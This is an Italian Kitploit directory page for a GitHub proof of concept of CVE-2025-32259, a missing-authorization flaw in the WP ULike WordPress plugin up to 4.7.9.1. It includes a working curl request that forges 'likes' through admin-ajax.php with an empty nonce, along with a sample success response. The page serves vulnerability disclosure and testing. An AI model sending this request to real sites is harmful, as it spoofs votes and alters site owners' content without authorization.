Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wp-ulike-cve-2025-32259-poc — Nelle versioni interessate del plugin WP ULike, non è presente un controllo di autorizzazione adeguato prima di consentire determinate azioni AJAX o manipolazioni dei voti. Ciò consente a utenti non autenticati di interagire con il plugin in modi che dovrebbero essere consentiti solo agli utenti che hanno effettuato l'accesso, con il rischio di alterare i voti o di iniettare dati fuorvianti. | Kitploit
Strumenti/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

1 anno faNon ancora revisionato

Nelle versioni interessate del plugin WP ULike, non è presente un controllo di autorizzazione adeguato prima di consentire determinate azioni AJAX o manipolazioni dei voti. Ciò consente a utenti non autenticati di interagire con il plugin in modi che dovrebbero essere consentiti solo agli utenti che hanno effettuato l'accesso, con il rischio di alterare i voti o di iniettare dati fuorvianti.

Condividi

WP ULike ≤ 4.7.9.1 - Spoofing di contenuti non autenticato (CVE-2025-32259)

🔬 Una semplice PoC che dimostra CVE-2025-32259 nel plugin WP ULike per WordPress.
🚨 Solo uso educativo – non testare su sistemi senza autorizzazione esplicita.


🧠 Panoramica

WP ULike è un popolare plugin WordPress che consente agli utenti di mettere "mi piace" ai contenuti di un sito. Le versioni fino alla 4.7.9.1 presentano una vulnerabilità di autorizzazione mancante, che consente a utenti non autenticati di falsificare le azioni "mi piace" tramite richieste AJAX.

  • CVE: CVE-2025-32259
  • Versioni vulnerabili: ≤ 4.7.9.1
  • Versione corretta: 4.7.9.2

🚀 Prova di concetto

La vulnerabilità consente a utenti non autenticati di interagire con l'endpoint AJAX e mettere "mi piace" a qualsiasi contenuto (post, commento, ecc.) senza permesso.

🔧 Script PoC

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Sostituisci id=1 con un ID di post valido.

Una risposta di successo potrebbe essere simile a:

root@kitploit:~
{"status":"success","msg":"You liked this."}
Scarica lo strumento